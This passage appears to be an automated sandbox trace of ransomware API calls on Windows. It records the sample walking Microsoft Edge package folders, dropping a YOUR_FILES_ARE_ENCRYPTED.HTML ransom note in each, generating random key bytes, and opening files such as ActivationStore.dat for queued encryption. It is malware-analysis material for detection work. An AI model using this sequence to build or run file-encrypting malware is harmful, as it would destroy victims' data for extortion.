lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x88006be9, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x88006be9, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x88006be9, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dda6, dwReserved1=0x315dcf8, cFileName="..", cAlternateFileName="")) returned 1 [0116.414] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x88006be9, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x88006be9, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x88006be9, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dda6, dwReserved1=0x315dcf8, cFileName="..", cAlternateFileName="")) returned 0 [0116.414] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0116.414] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0116.414] GetProcessHeap () returned 0x600000 [0116.414] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.414] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\localcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0116.415] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.416] CloseHandle (hObject=0x214) returned 1 [0116.416] GetProcessHeap () returned 0x600000 [0116.416] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.416] GetProcessHeap () returned 0x600000 [0116.416] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.417] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87fe09a0, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x87fe09a0, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x87fe09a0, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalState", cAlternateFileName="LOCALS~1")) returned 1 [0116.417] StrStrIW (lpFirst="LocalState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.417] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\LocalState") returned 97 [0116.417] GetProcessHeap () returned 0x600000 [0116.417] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.418] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\LocalState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\LocalState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\LocalState" [0116.418] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\LocalState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\LocalState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\LocalState\\*" [0116.418] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\LocalState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87fe09a0, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x87fe09a0, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x87fe09a0, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dda6, dwReserved1=0x315dcf8, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0116.418] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87fe09a0, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x87fe09a0, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x87fe09a0, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dda6, dwReserved1=0x315dcf8, cFileName="..", cAlternateFileName="")) returned 1 [0116.418] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x87fe09a0, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x87fe09a0, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x87fe09a0, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dda6, dwReserved1=0x315dcf8, cFileName="..", cAlternateFileName="")) returned 0 [0116.418] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0116.418] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0116.418] GetProcessHeap () returned 0x600000 [0116.418] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.418] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\LocalState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\localstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0116.419] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0116.420] CloseHandle (hObject=0x214) returned 1 [0116.420] GetProcessHeap () returned 0x600000 [0116.420] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.420] GetProcessHeap () returned 0x600000 [0116.420] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0116.420] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x888ab4e8, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x888ab4e8, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x888ab4e8, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Microsoft.MicrosoftEdge_25.10586.0.0_neutral__8wekyb3d8bbwe", cAlternateFileName="MICROS~1.0_N")) returned 1 [0116.420] StrStrIW (lpFirst="Microsoft.MicrosoftEdge_25.10586.0.0_neutral__8wekyb3d8bbwe", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.420] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Microsoft.MicrosoftEdge_25.10586.0.0_neutral__8wekyb3d8bbwe") returned 146 [0116.420] GetProcessHeap () returned 0x600000 [0116.420] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0116.420] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Microsoft.MicrosoftEdge_25.10586.0.0_neutral__8wekyb3d8bbwe" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Microsoft.MicrosoftEdge_25.10586.0.0_neutral__8wekyb3d8bbwe") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Microsoft.MicrosoftEdge_25.10586.0.0_neutral__8wekyb3d8bbwe" [0116.420] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Microsoft.MicrosoftEdge_25.10586.0.0_neutral__8wekyb3d8bbwe", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Microsoft.MicrosoftEdge_25.10586.0.0_neutral__8wekyb3d8bbwe\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Microsoft.MicrosoftEdge_25.10586.0.0_neutral__8wekyb3d8bbwe\\*" [0116.420] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Microsoft.MicrosoftEdge_25.10586.0.0_neutral__8wekyb3d8bbwe\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x888ab4e8, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x888ab4e8, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x888ab4e8, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dda6, dwReserved1=0x315dcf8, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0116.420] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x888ab4e8, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x888ab4e8, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x888ab4e8, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dda6, dwReserved1=0x315dcf8, cFileName="..", cAlternateFileName="")) returned 1 [0116.420] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x888ab4e8, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x888d1750, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x888d1750, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x315dda6, dwReserved1=0x315dcf8, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 1 [0116.420] StrStrIW (lpFirst="ActivationStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.420] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Microsoft.MicrosoftEdge_25.10586.0.0_neutral__8wekyb3d8bbwe\\ActivationStore") returned 162 [0116.420] GetProcessHeap () returned 0x600000 [0116.420] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0116.421] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Microsoft.MicrosoftEdge_25.10586.0.0_neutral__8wekyb3d8bbwe\\ActivationStore" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Microsoft.MicrosoftEdge_25.10586.0.0_neutral__8wekyb3d8bbwe\\ActivationStore") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Microsoft.MicrosoftEdge_25.10586.0.0_neutral__8wekyb3d8bbwe\\ActivationStore" [0116.421] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Microsoft.MicrosoftEdge_25.10586.0.0_neutral__8wekyb3d8bbwe\\ActivationStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Microsoft.MicrosoftEdge_25.10586.0.0_neutral__8wekyb3d8bbwe\\ActivationStore\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Microsoft.MicrosoftEdge_25.10586.0.0_neutral__8wekyb3d8bbwe\\ActivationStore\\*" [0116.421] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Microsoft.MicrosoftEdge_25.10586.0.0_neutral__8wekyb3d8bbwe\\ActivationStore\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x888ab4e8, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x888d1750, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x888d1750, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x315dd00, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0116.422] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x888ab4e8, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x888d1750, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x888d1750, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x315dd00, cFileName="..", cAlternateFileName="")) returned 1 [0116.422] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x888ab4e8, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x934dcb8, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x88a4ee47, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x6b4210, dwReserved1=0x315dd00, cFileName="ActivationStore.dat", cAlternateFileName="ACTIVA~1.DAT")) returned 1 [0116.423] StrStrIW (lpFirst="ActivationStore.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.423] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Microsoft.MicrosoftEdge_25.10586.0.0_neutral__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned 182 [0116.423] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0116.423] lstrlenW (lpString=".dat") returned 4 [0116.423] PathFindExtensionW (pszPath="ActivationStore.dat") returned=".dat" [0116.423] SystemFunction036 (in: RandomBuffer=0x19de58, RandomBufferLength=0x20 | out: RandomBuffer=0x19de58) returned 1 [0116.423] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Microsoft.MicrosoftEdge_25.10586.0.0_neutral__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\microsoft.microsoftedge_25.10586.0.0_neutral__8wekyb3d8bbwe\\activationstore\\activationstore.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x31c [0116.423] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x19de7c | out: lpFileSize=0x19de7c*=65536) returned 1 [0116.423] GetProcessHeap () returned 0x600000 [0116.423] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x670340 [0116.425] wsprintfW (in: param_1=0x19dd96, param_2="%02X" | out: param_1="4D") returned 2 [0116.425] wsprintfW (in: param_1=0x19dd9a, param_2="%02X" | out: param_1="CD") returned 2 [0116.425] wsprintfW (in: param_1=0x19dd9e, param_2="%02X" | out: param_1="B1") returned 2 [0116.425] wsprintfW (in: param_1=0x19dda2, param_2="%02X" | out: param_1="08") returned 2 [0116.425] wsprintfW (in: param_1=0x19dda6, param_2="%02X" | out: param_1="AD") returned 2 [0116.425] wsprintfW (in: param_1=0x19ddaa, param_2="%02X" | out: param_1="76") returned 2 [0116.426] wsprintfW (in: param_1=0x19ddae, param_2="%02X" | out: param_1="02") returned 2 [0116.426] wsprintfW (in: param_1=0x19ddb2, param_2="%02X" | out: param_1="16") returned 2 [0116.426] wsprintfW (in: param_1=0x19ddb6, param_2="%02X" | out: param_1="D8") returned 2 [0116.426] wsprintfW (in: param_1=0x19ddba, param_2="%02X" | out: param_1="AC") returned 2 [0116.426] wsprintfW (in: param_1=0x19ddbe, param_2="%02X" | out: param_1="6B") returned 2 [0116.426] wsprintfW (in: param_1=0x19ddc2, param_2="%02X" | out: param_1="86") returned 2 [0116.426] wsprintfW (in: param_1=0x19ddc6, param_2="%02X" | out: param_1="DE") returned 2 [0116.426] wsprintfW (in: param_1=0x19ddca, param_2="%02X" | out: param_1="ED") returned 2 [0116.426] wsprintfW (in: param_1=0x19ddce, param_2="%02X" | out: param_1="DC") returned 2 [0116.426] wsprintfW (in: param_1=0x19ddd2, param_2="%02X" | out: param_1="ED") returned 2 [0116.426] wsprintfW (in: param_1=0x19ddd6, param_2="%02X" | out: param_1="34") returned 2 [0116.426] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="24") returned 2 [0116.426] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="62") returned 2 [0116.426] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="49") returned 2 [0116.426] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="2A") returned 2 [0116.426] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="4E") returned 2 [0116.426] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="E4") returned 2 [0116.426] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="72") returned 2 [0116.426] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="82") returned 2 [0116.426] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="1E") returned 2 [0116.426] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="F7") returned 2 [0116.426] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="E4") returned 2 [0116.426] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="D0") returned 2 [0116.426] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="1B") returned 2 [0116.426] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="18") returned 2 [0116.426] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="51") returned 2 [0116.427] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Microsoft.MicrosoftEdge_25.10586.0.0_neutral__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Microsoft.MicrosoftEdge_25.10586.0.0_neutral__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Microsoft.MicrosoftEdge_25.10586.0.0_neutral__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat" [0116.427] CreateIoCompletionPort (FileHandle=0x31c, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0116.427] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0116.427] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x888d1750, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x888d1750, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x888d1750, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0xf000, dwReserved0=0x6b4210, dwReserved1=0x315dd00, cFileName="ActivationStore.dat.LOG1", cAlternateFileName="ACTIVA~1.LOG")) returned 1 [0116.427] StrStrIW (lpFirst="ActivationStore.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.427] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Microsoft.MicrosoftEdge_25.10586.0.0_neutral__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG1") returned 187 [0116.427] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0116.427] lstrlenW (lpString=".LOG1") returned 5 [0116.427] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0116.427] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x888d1750, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x888d1750, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x888d1750, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x315dd00, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 1 [0116.427] StrStrIW (lpFirst="ActivationStore.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.427] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Microsoft.MicrosoftEdge_25.10586.0.0_neutral__8wekyb3d8bbwe\\ActivationStore\\ActivationStore.dat.LOG2") returned 187 [0116.427] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0116.427] lstrlenW (lpString=".LOG2") returned 5 [0116.427] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0116.427] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x888d1750, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0x888d1750, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0x888d1750, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6b4210, dwReserved1=0x315dd00, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 0 [0116.427] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0116.427] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Microsoft.MicrosoftEdge_25.10586.0.0_neutral__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 192 [0116.427] GetProcessHeap () returned 0x600000 [0116.427] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.427] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Microsoft.MicrosoftEdge_25.10586.0.0_neutral__8wekyb3d8bbwe\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: 